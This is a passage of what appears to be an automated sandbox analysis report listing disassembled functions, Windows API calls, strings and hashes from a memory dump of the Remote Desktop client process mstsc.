                                                                                                                                                                                    • String ID: SspiFreeAuthIdentity$SspiLocalFree$SspiPrepareForCredRead$SspiPrepareForCredWrite$SspiUnmarshalAuthIdentity$sspicli.dll
                                                                                                                                                                                    • API String ID: 2657807142-4078069544
                                                                                                                                                                                    • Opcode ID: 27cb8df35af52d0cf6e32449d162cd71de19933c8db95da7afa68df21914f278
                                                                                                                                                                                    • Instruction ID: d34740e11029cb7629226fff90cdbd17f006f3f3660ff1cf7d2fb405d0969b35
                                                                                                                                                                                    • Opcode Fuzzy Hash: 27cb8df35af52d0cf6e32449d162cd71de19933c8db95da7afa68df21914f278
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B51F271918306BEFB29CF66AD19F227B99BB0A315F050449FD00A71B2C7A0DC94EF91
                                                                                                                                                                                    Function 0091620F Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 104libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0091624F
                                                                                                                                                                                    • GetVersionExA.KERNEL32(00000094), ref: 00916268
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(USER32), ref: 00916284
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 009162A0
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 009162B1
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 009162C2
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 009162D3
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 009162E4
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 009162F5
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00916315
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModuleVersionmemset
                                                                                                                                                                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                                                                    • API String ID: 1373713818-2451437823
                                                                                                                                                                                    • Opcode ID: d495f9ed3d9860d4f7d5a4a686a2be50404846540991b5b5c4126cb438823468
                                                                                                                                                                                    • Instruction ID: 95e562e0bd992e2e1735ac5c6ab89b23f2c756d618faf3fd70522fd1e403ce2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: d495f9ed3d9860d4f7d5a4a686a2be50404846540991b5b5c4126cb438823468
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D31A5B1A283159BC7109F799C85A6A7AFCEB4D754B80002EE505E21D0DFF4C542EF93
                                                                                                                                                                                    Function 0094EB3C Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 255libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0094B6E6: memset.MSVCRT ref: 0094B70B
                                                                                                                                                                                      • Part of subcall function 0094B6E6: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,00000000), ref: 0094B739
                                                                                                                                                                                      • Part of subcall function 0094B6E6: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,00000000), ref: 0094B741
                                                                                                                                                                                      • Part of subcall function 0094B6E6: VerifyVersionInfoW.KERNEL32(?,00000003,00000000), ref: 0094B74E
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(ntdll.dll,00000000,00000000), ref: 0094EB83
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlEqualDomainName), ref: 0094EBDC
                                                                                                                                                                                    • memset.MSVCRT ref: 0094EC8A
                                                                                                                                                                                    • memset.MSVCRT ref: 0094ECA0
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(normaliz.dll,00000000,00000000), ref: 0094ECAF
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0094EE79
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0094EE84
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$Freememset$AddressConditionLoadMaskProc$HandleInfoMessageModuleTraceVerifyVersion
                                                                                                                                                                                    • String ID: IdnToNameprepUnicode$IdnToUnicode$RtlEqualDomainName$normaliz.dll$ntdll.dll$xn--
                                                                                                                                                                                    • API String ID: 2797081027-3313525300
                                                                                                                                                                                    • Opcode ID: 87ff8d8b3d847fe6ccdcb479ccd90c678cf229cdeb29ba43d9c6832b1bb0354c
                                                                                                                                                                                    • Instruction ID: 47a3975fa38571ed7742000ec8068a0fb832e54e8d5670866a280d799405a522
                                                                                                                                                                                    • Opcode Fuzzy Hash: 87ff8d8b3d847fe6ccdcb479ccd90c678cf229cdeb29ba43d9c6832b1bb0354c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9591CD71608341AFD725DFA4D849F6B7BE9BF88304F040919F984E71A2DB70C944EB5A
                                                                                                                                                                                    Function 00936ACE Relevance: 30.2, APIs: 20, Instructions: 182COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,0000331D,?,?), ref: 00936B3B
                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,0000331E,?,00000104), ref: 00936B61
                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,0000331F,?,00000104), ref: 00936B75
                                                                                                                                                                                      • Part of subcall function 00961C30: GetDlgItem.USER32(?,0096A070), ref: 00961C4E
                                                                                                                                                                                      • Part of subcall function 00961C30: EnableWindow.USER32(00000000), ref: 00961C55
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00000110,?,?), ref: 00936BAF
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000331E), ref: 00936BC4
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00936BCD
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000331F), ref: 00936BDB
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00936BDE
                                                                                                                                                                                    • GetDlgItem.USER32(?,00003320), ref: 00936BEC
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00936BEF
                                                                                                                                                                                    • GetDlgItem.USER32(?,00003321), ref: 00936BFD
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00936C00
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000110,?,00000110,00000000), ref: 00936C30
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000331E,-00006E98), ref: 00936C4A
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000331F,-000070A0), ref: 00936C5A
                                                                                                                                                                                    • CheckDlgButton.USER32(?,0000331D,00000000), ref: 00936C70
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000331D), ref: 00936C8B
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00936C92
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000331E), ref: 00936CC7
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00936CCE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$Window$Enable$Text$Button$Checked$Check
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1908904388-0
                                                                                                                                                                                    • Opcode ID: a6b81f04ce43243ecbe8710b27c7a609384d51ebfa2717e46e6c8497c594ba6c
                                                                                                                                                                                    • Instruction ID: 900accc8d5fe471b417a5b2c7e603d46b707e911474f27551f7f7345b198de04
                                                                                                                                                                                    • Opcode Fuzzy Hash: a6b81f04ce43243ecbe8710b27c7a609384d51ebfa2717e46e6c8497c594ba6c
                                                                                                                                                                                    • Instruction Fuzzy Hash: BD51C4B1610118AFDB11DF68CC88EBA77BCEB49700F4440A9F685DB2A1CB74AE40DF61
                                                                                                                                                                                    Function 0094B23D Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 338memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000202,00000000,00000001,?,?,00000000,?), ref: 0094B2B8
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000404), ref: 0094B2CF
                                                                                                                                                                                    • CredUnPackAuthenticationBufferW.CREDUI(00000001,?,00000101,00000000,?,00000000,00000000,00000000,?), ref: 0094B301
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0094B30F
                                                                                                                                                                                    • CredUnPackAuthenticationBufferW.CREDUI(00000001,00000101,00000101,00000000,?,00000000,00000000,00000000,00000101), ref: 0094B3A1
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000001,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 0094B5E2
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000001,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 0094B5ED
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Local$AllocAuthenticationBufferCredFreePack$ErrorLast
                                                                                                                                                                                    • String ID: StringCchCopy failed!$StringCchLength failed!
                                                                                                                                                                                    • API String ID: 3028302246-3392236819
                                                                                                                                                                                    • Opcode ID: 001e476dad851f36ae9fada93c0013063fb565cb4e655d3c15a7eed0bfc1b67a
                                                                                                                                                                                    • Instruction ID: ac5adb58688fb8670e5404ec1321bb86be6336bda27a2ff5a02aa83f76ac07e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 001e476dad851f36ae9fada93c0013063fb565cb4e655d3c15a7eed0bfc1b67a
                                                                                                                                                                                    • Instruction Fuzzy Hash: DCC17A70B04309AFDB15CFA5C895FAABBA9EF49304F104069F901AB2A2DBB4DD41DB10
                                                                                                                                                                                    Function 00958821 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 335filememoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 009587E5: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 009587F5
                                                                                                                                                                                      • Part of subcall function 009587E5: GetLastError.KERNEL32 ref: 00958800
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 009588BC
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 009588CC
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 00958909
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00958913
                                                                                                                                                                                    • memset.MSVCRT ref: 00958A1A
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00958A31
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00958A3C
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00958A44
                                                                                                                                                                                    • IsTextUnicode.ADVAPI32(00000000,?,?), ref: 00958ADC
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000), ref: 00958B3C
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040), ref: 00958B46
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000), ref: 00958BA0
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00958BA6
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 009589C9
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00958C29
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Local$ErrorFileFreeLast$AllocByteCharMultiReadWide$AddressHandleLibraryMessageModulePointerProcSizeTextTraceUnicodememset
                                                                                                                                                                                    • String ID: Failed to move pointer to the beginning of the file!
                                                                                                                                                                                    • API String ID: 3919189811-3433327527
                                                                                                                                                                                    • Opcode ID: a00593b508c1a5a5de6bd5f93bacc5005e3fd73d0207962d3eaf5c4ae0af3f2e
                                                                                                                                                                                    • Instruction ID: 6f69b33cc40ee2771b76e4e236fef170f9bca41fc091d1ca0b08079f4c2e1b66
                                                                                                                                                                                    • Opcode Fuzzy Hash: a00593b508c1a5a5de6bd5f93bacc5005e3fd73d0207962d3eaf5c4ae0af3f2e
                                                                                                                                                                                    • Instruction Fuzzy Hash: CCC11471608341AFD721DF26DC44B2B7BE9AB49321F040519FD91BB2A2CB74CC48EB92
                                                                                                                                                                                    Function 00917258 Relevance: 28.3, APIs: 9, Strings: 7, Instructions: 329windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0091727F
                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00917288
                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00917291
                                                                                                                                                                                    • CreateMenu.USER32 ref: 00917451
                                                                                                                                                                                    • InsertMenuW.USER32 ref: 009174E1
                                                                                                                                                                                    • InsertMenuW.USER32 ref: 009175F0
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 009176BB
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 009176C4
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 009176CD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • QueryInterface failed for IMsRdpExtendedSettings, xrefs: 009172DF
                                                                                                                                                                                    • RailMode, xrefs: 0091732E
                                                                                                                                                                                    • TSGTransportIsUsed, xrefs: 00917543
                                                                                                                                                                                    • Unable to get property (TS_PROP_CORE_EDGE_ACTIONS_SUPPORTED), xrefs: 00917414
                                                                                                                                                                                    • ServerSupportsEdgeActions, xrefs: 009173DE
                                                                                                                                                                                    • Unable to get property (TS_PROP_CORE_CONNECTION_IS_RAIL), xrefs: 00917358
                                                                                                                                                                                    • Unable to get property (TS_PROP_TRANSPORT_TSG_IS_USED), xrefs: 00917579
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Variant$ClearInitMenu$Insert$AddressCreateFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: QueryInterface failed for IMsRdpExtendedSettings$RailMode$ServerSupportsEdgeActions$TSGTransportIsUsed$Unable to get property (TS_PROP_CORE_CONNECTION_IS_RAIL)$Unable to get property (TS_PROP_CORE_EDGE_ACTIONS_SUPPORTED)$Unable to get property (TS_PROP_TRANSPORT_TSG_IS_USED)
                                                                                                                                                                                    • API String ID: 847888681-1683191911
                                                                                                                                                                                    • Opcode ID: a29c9e6583ccdc164ea9ebaed23336410b65d5be91f97e194dcece33bb5a7ebf
                                                                                                                                                                                    • Instruction ID: ef17f1c5a1ebd30ab06284164d992bdcb6fff94271cc8b14899c3e772f288a92
                                                                                                                                                                                    • Opcode Fuzzy Hash: a29c9e6583ccdc164ea9ebaed23336410b65d5be91f97e194dcece33bb5a7ebf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CC1C17174C309AEDB25DF94DC59FA9BBBAAB88300F140488F515AB1E2C6B4DDC0AF51
                                                                                                                                                                                    Function 0093419B Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 304memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00934286
                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00934293
                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 009342A0
                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 009342A7
                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 009342B4
                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,00000000,00000000,?,00000000), ref: 009342F3
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093431B
                                                                                                                                                                                    • GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 0093433E
                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00934364
                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 009343B9
                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00934413
                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0093446D
                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 009344C6
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String$Free$Alloc$ErrorLast$AddressCurrentDirectoryHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: BSTR$CTscComHelper::StartRemoteApplication failed!$LoadConnectionSharingSettings failed
                                                                                                                                                                                    • API String ID: 2183484674-128383092
                                                                                                                                                                                    • Opcode ID: 6517f768b5f94184f1eabc83c96ff07a2a7ba819a79dad220a7c568dcd37894c
                                                                                                                                                                                    • Instruction ID: 5be816e56b85cb47dc8dfd8632096870058938f4b18db4abd86715f1a2898758
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6517f768b5f94184f1eabc83c96ff07a2a7ba819a79dad220a7c568dcd37894c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 29B1C171A04358AFCB35CF24CC89B6A7BE9AB48314F164099F904F72A2C674ED90DF55
                                                                                                                                                                                    Function 0095A14B Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 342memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000202,?,?,?,00000004), ref: 0095A1BC
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000404), ref: 0095A216
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0095A29B
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0095A2B8
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0095A2C9
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0095A32B
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000101), ref: 0095A33C
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    • CredUnPackAuthenticationBufferW.CREDUI(00000000,?,?,00000000,?,00000000,00000000,00000000,00000101), ref: 0095A363
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000004,?,?,?,?,?,?), ref: 0095A54F
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00000004,?,?,?,?,?,?), ref: 0095A55D
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000004,?,?,?,?,?,?), ref: 0095A568
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Local$Free$Alloc$MessageTrace$AddressAuthenticationBufferCredErrorHandleLastLibraryModulePackProc
                                                                                                                                                                                    • String ID: CreateSPN failed$PWSTR$StringCchLength failed$TERMSRV
                                                                                                                                                                                    • API String ID: 129126779-209314103
                                                                                                                                                                                    • Opcode ID: eed136bb05c5347c958c194cdcdc2f1129a2931dda39379e9cd1f82467dc6c75
                                                                                                                                                                                    • Instruction ID: da7c4577ba002bf78d4b4a4b1d5a607d12b17d53b5ce0dfb99f2aaea2fcdfedc
                                                                                                                                                                                    • Opcode Fuzzy Hash: eed136bb05c5347c958c194cdcdc2f1129a2931dda39379e9cd1f82467dc6c75
                                                                                                                                                                                    • Instruction Fuzzy Hash: 51C1F071A04305AFCB29CF96D849F6D3BA9AB49305F14415DFD00AB2A1C7B4CD85EF4A
                                                                                                                                                                                    Function 009599C3 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 335COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 009599F0
                                                                                                                                                                                    • CredGetSessionTypes.ADVAPI32(00000007,?), ref: 00959A7C
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00959AA4
                                                                                                                                                                                    • GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 00959AC7
                                                                                                                                                                                    • CredWriteW.ADVAPI32(00000000,00000000,?,?,?,00000004,?,?,?,?,?), ref: 00959C52
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000004,?,?,?,?,?), ref: 00959C5C
                                                                                                                                                                                    • CredWriteW.ADVAPI32(00000000,00000000,?,?,00000004,?,?,?,?,?), ref: 00959C88
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000004,?,?,?,?,?), ref: 00959C96
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00959D95
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00959DA0
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00959DBA
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorFreeLast$CredLocal$MessageTraceWrite$AddressHandleLibraryModuleProcSessionTypesmemset
                                                                                                                                                                                    • String ID: CredWrite failed$PrepareForCredWriteNew failed$PrepareForCredWriteOld failed$TERMSRV
                                                                                                                                                                                    • API String ID: 1352401320-3796034688
                                                                                                                                                                                    • Opcode ID: 4f3e52038290753b3a8b0636cf84787ee37fe6df91546e4f784f868fde488fcf
                                                                                                                                                                                    • Instruction ID: 6c2010cf89757cc6029270b4c8f4f66e1b75a3632a065622b0e2942b4f09a19e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f3e52038290753b3a8b0636cf84787ee37fe6df91546e4f784f868fde488fcf
                                                                                                                                                                                    • Instruction Fuzzy Hash: EFC1A072A04318EFEB25DF96D844FAA7BB9AB49311F040059FD01AB2A2D771DC44DFA1
                                                                                                                                                                                    Function 009348A1 Relevance: 25.7, APIs: 17, Instructions: 163COMMON
                                                                                                                                                                                    Download Yara Rule
